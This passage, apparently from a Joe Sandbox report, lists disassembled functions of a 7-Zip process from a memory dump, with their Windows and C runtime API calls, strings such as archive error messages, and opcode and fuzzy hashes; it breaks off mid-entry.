                              • Opcode ID: f5371d4f1c8be3d2cd4b96a06495a9a688ff4ac40cd855094cfe712e190730be
                              • Instruction ID: 414ab4aa1d2b2625916b3a9a33a54a86e3e0f44d2de79dd21243cf2fcc6e8188
                              • Opcode Fuzzy Hash: f5371d4f1c8be3d2cd4b96a06495a9a688ff4ac40cd855094cfe712e190730be
                              • Instruction Fuzzy Hash: 8E01802264190BD9DB14EF21ED43BB93360A790748F444436E60E46621DF7CC989E342
                              Function 00F77088 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: DirectoryRemovefree
                              • String ID:
                              • API String ID: 736856642-0
                              • Opcode ID: cbcf866b53d13db80e8e222a7ee0d8887e3a5f826af55dbd1e24815ed5a3ca40
                              • Instruction ID: 54c51fc38d505cf56210d98b94d2b9ba9702b82eb21f72c4c163f45f569f03e3
                              • Opcode Fuzzy Hash: cbcf866b53d13db80e8e222a7ee0d8887e3a5f826af55dbd1e24815ed5a3ca40
                              • Instruction Fuzzy Hash: 99F0A92221C74281DA30BB21DD9433D1324A7867F0F988227DD6D477A4DF1DCA46F712
                              Function 00FCDBD0 Relevance: 6.0, APIs: 4, Instructions: 40threadCOMMON
                              Download Yara Rule
                              APIs
                              • _beginthreadex.MSVCRT ref: 00FCDC05
                              • SetThreadAffinityMask.KERNEL32 ref: 00FCDC21
                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F90036), ref: 00FCDC2A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F90036), ref: 00FCDC35
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Thread$AffinityErrorLastMaskResume_beginthreadex
                              • String ID:
                              • API String ID: 3268521904-0
                              • Opcode ID: 0eb2c4fed634916439255adc594d4315e165d013655c49e6180ab7547dcb86a1
                              • Instruction ID: 7d7c4ddd7e6c63303d7e55203d7bb8b167bdb6fc549325d5fdd00f167ac5e113
                              • Opcode Fuzzy Hash: 0eb2c4fed634916439255adc594d4315e165d013655c49e6180ab7547dcb86a1
                              • Instruction Fuzzy Hash: EA011E71B04B8186DB148B62B90435EB3A6F788BE4F44413AEE8D93B68DF3CD455D700
                              Function 00FCDAF0 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB0B
                              • GetLastError.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB15
                              • CloseHandle.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB30
                              • GetLastError.KERNEL32(?,?,?,?,00F8DC82), ref: 00FCDB3A
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseHandleObjectSingleWait
                              • String ID:
                              • API String ID: 1796208289-0
                              • Opcode ID: 20927bd67de178b141ed70e46c2400a5cb6a50c06f908c91ecc38c4b6e214695
                              • Instruction ID: c5767b9c1aae875563017ec7bc713884e7bc17041b1d25a54fe439c868183525
                              • Opcode Fuzzy Hash: 20927bd67de178b141ed70e46c2400a5cb6a50c06f908c91ecc38c4b6e214695
                              • Instruction Fuzzy Hash: B3014436705B4282D7119F55A98132DB2A6FBC8BD0F69403ADB9A83B64CF39CC459700
                              Function 00FCC240 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$fputcfree
                              • String ID:
                              • API String ID: 3819637083-0
                              • Opcode ID: 934a68243781ab1459bdcaabf1af4d14b2fd43091159421678264a0e9dc9869b
                              • Instruction ID: 0926ff29d12a36c422ce2fd6ecba28d69e774c3bd143efcd04e0161a1f388755
                              • Opcode Fuzzy Hash: 934a68243781ab1459bdcaabf1af4d14b2fd43091159421678264a0e9dc9869b
                              • Instruction Fuzzy Hash: 85F04462304A0182DA30EB16F95036E7321EB99FF4F0883329EAE07BA5DE2CC545D700
                              Function 00FC3BCC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              • memmove.MSVCRT ref: 00FC3C15
                                • Part of subcall function 00FC266C: CompareFileTime.KERNEL32(?,?,?,00000000,00FC3C28), ref: 00FC26B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CompareFileTimememmove
                              • String ID: alternate streams$files$streams
                              • API String ID: 1303509325-806849385
                              • Opcode ID: d66be76babb78bd12987e0d8c24c2a97867c662a3c1aea18026358ed3a82a895
                              • Instruction ID: 1431e12a35ca422a09dedcfb07d7004873b84201df2f17f37659db9e2b5a76ad
                              • Opcode Fuzzy Hash: d66be76babb78bd12987e0d8c24c2a97867c662a3c1aea18026358ed3a82a895
                              • Instruction Fuzzy Hash: 26F0C85631059762EB20EB25DA12F9D6311F744BC4F809027AA4D47D64DF3CC7AADB40
                              Function 00F755AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: UNC
                              • API String ID: 0-337201128
                              • Opcode ID: 040324d980f1719f02727546357e513bd059180586bb5427fb9611b820104c27
                              • Instruction ID: 33f27593e4fbd87ddf030aa7ff7bfabac8faa891ae94c1bd03ec3adedf70ad51
                              • Opcode Fuzzy Hash: 040324d980f1719f02727546357e513bd059180586bb5427fb9611b820104c27
                              • Instruction Fuzzy Hash: ED214F36700E45C6DB208B19D8943683361E745F99F94C427CF5E47720DEB9CC85E702
                              Function 00FBFE5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FBFEC9
                              • free.MSVCRT ref: 00FBFEE8
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: ERROR:
                              • API String ID: 2276422817-977468659
                              • Opcode ID: af0e391c0156e52b3ee0ff6b2653460558874c0d18be1c406c991f3cf6241498
                              • Instruction ID: b79f090dea2d29e72c2fc30afec5c65c3cc22b50bb331537290b9378490cd23b
                              • Opcode Fuzzy Hash: af0e391c0156e52b3ee0ff6b2653460558874c0d18be1c406c991f3cf6241498
                              • Instruction Fuzzy Hash: 78119012601A4142CA74EF26ED5577E7321EB85BE0F488637AE6E477A2DF2CC485E311
                              Function 00F7C59C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C5EA
                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C638
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: QueryValue
                              • String ID: Path64
                              • API String ID: 3660427363-321863482
                              • Opcode ID: 3e36a2070c8cd30f763719b18a8e4b0c4c1538323c3854aa666b6aa9b8727d3f
                              • Instruction ID: 8b5997e681c61e363fbd915f7629ec4fe788a027c0d5d4a6afdca7732a8e0b84
                              • Opcode Fuzzy Hash: 3e36a2070c8cd30f763719b18a8e4b0c4c1538323c3854aa666b6aa9b8727d3f
                              • Instruction Fuzzy Hash: 1D214F72A14601C7EB14CF25E49472E77A1F784B94F20912AEB8D07B68DB3DC845CF41
                              Function 00FC4030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Cannot open encrypted archive. Wrong password?, xrefs: 00FC404B
                              • Cannot open the file as archive, xrefs: 00FC408C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                              • API String ID: 1795875747-1623556331
                              • Opcode ID: c6968f3a05ef64af6869a254c054bcc4eb343a8f49ab6b9c38f5bfdb54862b68
                              • Instruction ID: 2d2f90cd7e6594891392170b184e1a0b2e59e00b54f3b05b118da2fb1ad96725
                              • Opcode Fuzzy Hash: c6968f3a05ef64af6869a254c054bcc4eb343a8f49ab6b9c38f5bfdb54862b68
                              • Instruction Fuzzy Hash: 96018F6279064292DEA8EB2AEE5276C3312EB44BC0F4890379E0E47742DE3DC489E301
                              Function 00F7A248 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: wcscmp
                              • String ID: \??\
                              • API String ID: 3392835482-3047946824
                              • Opcode ID: af393b9c7b079674be752cf34931546a976f289b8089ea351c38a9871534e838
                              • Instruction ID: 5afcc41aff9f13298b7053db8515db2f764a2d5fc1a5e014667142b1a01ddc75
                              • Opcode Fuzzy Hash: af393b9c7b079674be752cf34931546a976f289b8089ea351c38a9871534e838
                              • Instruction Fuzzy Hash: 2CF06D62600441D7DE109B6AD99032C3322F7C5B99F949533DB0E57A15DF26C8EAE312
                              Function 00FC17A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC17C9
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Scan$Scanning
                              • API String ID: 269475090-1436252306
                              • Opcode ID: 918866416367ea8d62adf42bc1e3610d7259f91b6149cb6a386ecb25a418ceed
                              • Instruction ID: c53d1772fd8cfc8bf89decae3cba0dc54588ea7b9c585e47dfa0e842f6b06652
                              • Opcode Fuzzy Hash: 918866416367ea8d62adf42bc1e3610d7259f91b6149cb6a386ecb25a418ceed
                              • Instruction Fuzzy Hash: 5DF0B46670198791DF14DF29DE467782322FB45B98F588137CB0D8B991DF2CC496D310
                              Function 00F7C084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AllocExceptionStringThrow
                              • String ID: out of memory
                              • API String ID: 3773818493-2599737071
                              • Opcode ID: fee9fe5cc1f96ddeb0f4fccb085440423c7cc7129ed4ae58c0e1be1705a74dce
                              • Instruction ID: 8191150f54c4fded822ae014298126505c1d8ed789a2ce1693a0dde176225163
                              • Opcode Fuzzy Hash: fee9fe5cc1f96ddeb0f4fccb085440423c7cc7129ed4ae58c0e1be1705a74dce
                              • Instruction Fuzzy Hash: E7F0A022301B8692CB149B11EA8571C7371FB45B84F94D439CB8C07B24EF79C4A8D701
                              Function 00FCBA90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCBAB0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Scan $Scanning the drive:
                              • API String ID: 269475090-1085461122
                              • Opcode ID: 73586940df00f4b6d69776cd6b74b715b6af59ddf40c0bb38739c2a336eb302c
                              • Instruction ID: 6916e476b17ea18ab5a2ac9fea233e1d4e9a5416372b7f98599a8da029580d8b
                              • Opcode Fuzzy Hash: 73586940df00f4b6d69776cd6b74b715b6af59ddf40c0bb38739c2a336eb302c
                              • Instruction Fuzzy Hash: CAE04F6530194281DB55DB25DE4236C23229B44BE4F9494338E1D06625EF28C5DAD310
                              Function 00FAD464 Relevance: 5.3, APIs: 4, Instructions: 261COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FAD4F6
                              • free.MSVCRT ref: 00FAD4FE
                              • free.MSVCRT ref: 00FAD7E8
                              • free.MSVCRT ref: 00FAD7F0
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75A90
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75A98
                                • Part of subcall function 00F75A4C: free.MSVCRT ref: 00F75B9C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 1cf6d272e49ba4ce669bb840d82070fe307918df0bc4e7053bc0e4e4911742c5
                              • Instruction ID: 71ca2f9f023a646096beece41e4699ff62517283969f5452557913447363661e
                              • Opcode Fuzzy Hash: 1cf6d272e49ba4ce669bb840d82070fe307918df0bc4e7053bc0e4e4911742c5
                              • Instruction Fuzzy Hash: 62A1DFB2704B8196CB24DF26D5843AE7760F786BA4F148126DF8F47BA0EB39C854D701
                              Function 00F7F9FC Relevance: 5.1, APIs: 4, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                              • Instruction ID: 8a8c6f8d538bd0dbdbd0c22fcbef3ecc254daba6314c2f837b3c668f0c5695c6
                              • Opcode Fuzzy Hash: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                              • Instruction Fuzzy Hash: 5741D763A0828296D730EB19D95026D6761F3987E4F44C133EB9D4B658EB3CC99AE703
                              Function 00FA8798 Relevance: 5.1, APIs: 4, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 94b2e959682d2308284c979b5997617d8cbc15843639581ed360518275078fb1
                              • Instruction ID: 54533536317c783adfd8d4c1030d8d94f4d1f631185cd95e872408998dc5434f
                              • Opcode Fuzzy Hash: 94b2e959682d2308284c979b5997617d8cbc15843639581ed360518275078fb1
                              • Instruction Fuzzy Hash: 972105B7A01B8485DB55AF26D8547297758FB86BE4F6C81259F5D0B340EFBCC842E310
                              Function 00FBE418 Relevance: 5.1, APIs: 4, Instructions: 82COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 4916301fc4195bf7257e6660e747c78dc3022c4a2dcb8868d81adcbcc436c9fe
                              • Instruction ID: 6ad55d36adfd64ebc29205faa83aabf9da2966edd903ca46882a7d57ae47373d
                              • Opcode Fuzzy Hash: 4916301fc4195bf7257e6660e747c78dc3022c4a2dcb8868d81adcbcc436c9fe
                              • Instruction Fuzzy Hash: E531A833204A41D1CB60EF25D85139D7770F7C57A4F889222EA9E476A9EF3CC549EB11
                              Function 00F8EB88 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00F8EBA3
                              • LeaveCriticalSection.KERNEL32 ref: 00F8EBAF
                              • EnterCriticalSection.KERNEL32 ref: 00F8EC43
                              • LeaveCriticalSection.KERNEL32 ref: 00F8EC4F
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                              • Instruction ID: 43144e0a20930b4df0885b29608587c0491ec0e68126df972e33411b6066aa2f
                              • Opcode Fuzzy Hash: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                              • Instruction Fuzzy Hash: B2210076700B45A7CB20AF2AE9843AD3360F74AB98F585122DF4E47B10DF38D8A5D700
                              Function 00FAD024 Relevance: 5.1, APIs: 4, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FAD0B2
                              • free.MSVCRT ref: 00FAD0BC
                              • free.MSVCRT ref: 00FAD0C6
                              • free.MSVCRT ref: 00FAD0D0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$mallocmemmove
                              • String ID:
                              • API String ID: 1702027931-0
                              • Opcode ID: 9fcd43eefa73e394517c0ee8c9fd584c3da427bfd578f162cd9c0542c0702979
                              • Instruction ID: 62658090861b9350bc00ffd2555d969c57246cc144eeea6c59d3e2dee3cff3e4
                              • Opcode Fuzzy Hash: 9fcd43eefa73e394517c0ee8c9fd584c3da427bfd578f162cd9c0542c0702979
                              • Instruction Fuzzy Hash: 1F2183B2615B8482CBA0EF25E88021D33B5F7C9BA4F2082269B9E47768DF3DC855D741
                              Function 00F98930 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
